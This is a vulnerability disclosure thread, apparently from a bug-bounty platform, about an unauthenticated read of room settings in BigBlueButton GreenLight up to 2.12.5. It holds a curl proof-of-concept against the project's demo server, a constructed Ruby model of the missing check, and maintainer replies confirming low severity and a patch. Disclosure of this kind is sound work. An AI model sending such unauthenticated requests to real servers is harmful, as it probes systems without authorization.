Improper privilege management - Anyone can view room settings. in bigbluebutton/greenlight
Reported on
May 22nd 2022
Description
Hi bigbluebutton maintainers, I would like to report an improper privilege management issue that allows anyone to view any room's settings.
Proof of Concept
- To demonstrate the vulnerability, I've created a room
https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn
- Run this curl command to get the room settings
curl -i -s -k -X $'GET' \
-H $'Host: demo.bigbluebutton.org' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Dnt: 1' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-User: ?1' -H $'Te: trailers' -H $'Connection: close' \
$'https://demo.bigbluebutton.org/gl/hoa-j4s-sxx-5gn/room_settings'
The response looks like
{"muteOnStart":false,"requireModeratorApproval":true,"anyoneCanStart":false,"joinModerator":false,"recording":false}
- Note that there is no token/secret in the above curl command.
Impact
Allowing anyone to view any room settings
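The bug class in this report is a read action on room settings that is not covered by the room-ownership check the other room actions get. The following is an added, constructed stand-alone model of that pattern (not GreenLight's code and not the content of the later fix): the controller, the `protected_actions` list, the `authorized?` rule and the status codes are all assumptions, and the sample room reuses the settings JSON from the report.

```ruby
# Constructed model of a missing-authorization bug on a settings read action.
# Assumptions: a Rails-like controller that only runs its ownership check for
# actions listed in protected_actions; GreenLight's real code is not modelled.
require 'json'

Room = Struct.new(:uid, :owner_id, :settings)
User = Struct.new(:id, :admin)

class RoomsController
  attr_reader :protected_actions

  def initialize(rooms, protected_actions)
    @rooms = rooms.each_with_object({}) { |r, h| h[r.uid] = r }
    @protected_actions = protected_actions
  end

  # Simulates GET /<uid>/<action>; current_user is nil for an anonymous client.
  # Returns [status, body] so the outcome can be checked without a web stack.
  def dispatch(action, uid, current_user)
    room = @rooms.fetch(uid) { return [404, 'not found'] }
    if protected_actions.include?(action) && !authorized?(room, current_user)
      return [403, 'forbidden']
    end
    return [404, 'no such action'] unless respond_to?(action, true)
    send(action, room)
  end

  private

  # Only the room owner or an admin may see the settings of a room.
  def authorized?(room, user)
    !user.nil? && (user.admin || user.id == room.owner_id)
  end

  def room_settings(room)
    [200, JSON.generate(room.settings)]
  end
end

# Sample room with the settings shown in the report's response (constructed).
SAMPLE_ROOM = Room.new('hoa-j4s-sxx-5gn', 7,
  { 'muteOnStart' => false, 'requireModeratorApproval' => true,
    'anyoneCanStart' => false, 'joinModerator' => false, 'recording' => false })

# Vulnerable shape: :room_settings is absent from the protected list, so the
# ownership check never runs for it and an anonymous GET receives the JSON.
VULNERABLE = RoomsController.new([SAMPLE_ROOM], [:destroy, :update_settings])
# Hardened shape: the read action is covered by the same check as the writes.
PATCHED    = RoomsController.new([SAMPLE_ROOM],
                                 [:destroy, :update_settings, :room_settings])
```

The point to take from the two controllers is that the check must cover read actions as well as the write actions it was originally added for; a quick audit is to diff the action list of each authorization filter against the full list of routed actions.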
Hi @xiviu!
Thank you for reporting this!!
Overall you are spot-on with your finding about the issue and how to trigger it. However, it is part of a different component of BigBlueButton.
Could you please tweak this (or re-open it) towards GreenLight -- https://github.com/bigbluebutton/greenlight version 2.12.5?
For "Occurrence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316
Please tweak it so that when we patch it the fix link is to the targeted project. Much appreciated!
-Anton
Hi @xiviu, Please open a new report but use https://github.com/bigbluebutton/greenlight version 2.12.5 instead of https://github.com/bigbluebutton/bigbluebutton
For "Occurrence" you could point to https://github.com/bigbluebutton/greenlight/blob/master/app/controllers/rooms_controller.rb#L316 instead of the current https://github.com/bigbluebutton/bigbluebutton/blob/52e302c28a6bd799762420e3076a92ba11bbaea9/bigbluebutton-html5/imports/ui/components/audio/container.jsx#L23
Once you open the new (more accurate) report we can close this one.
Thanks again! -Anton
@antobinary - sorted 👍
The report is now pointing to the greenlight repository and I have updated the occurrence to your suggestion :)
Let me know if you have any further questions or issues!
Thanks @xiviu for the report! Thanks @Jamie for applying the tweaks to the report!
We confirm this is an issue with GreenLight <=2.12.5 and we're looking into patching it.
Upon further investigation the actual severity is Low, though: the information that could be revealed to the world is just a few settings related to the meeting. No IDs, no secrets, no user data, etc. We are still going to patch it, of course.
We have created a GitHub Security Advisory (private for the moment; it will be published after the patch has been released and after some time has been provided for administrators to upgrade). That advisory will have a CVE associated with it, so no need to duplicate this here.
Hi @xiviu,
We have fixed the issue via https://github.com/bigbluebutton/greenlight/pull/3508 and released a patch - https://github.com/bigbluebutton/greenlight/releases/tag/release-2.12.6
On June 17 (in 3 days) we will be in a position to mark this as fixed. We provided a few days to our community to upgrade their GreenLight to the patched version.
We have made public the security advisory - https://github.com/bigbluebutton/greenlight/security/advisories/GHSA-phh8-3v6v-7498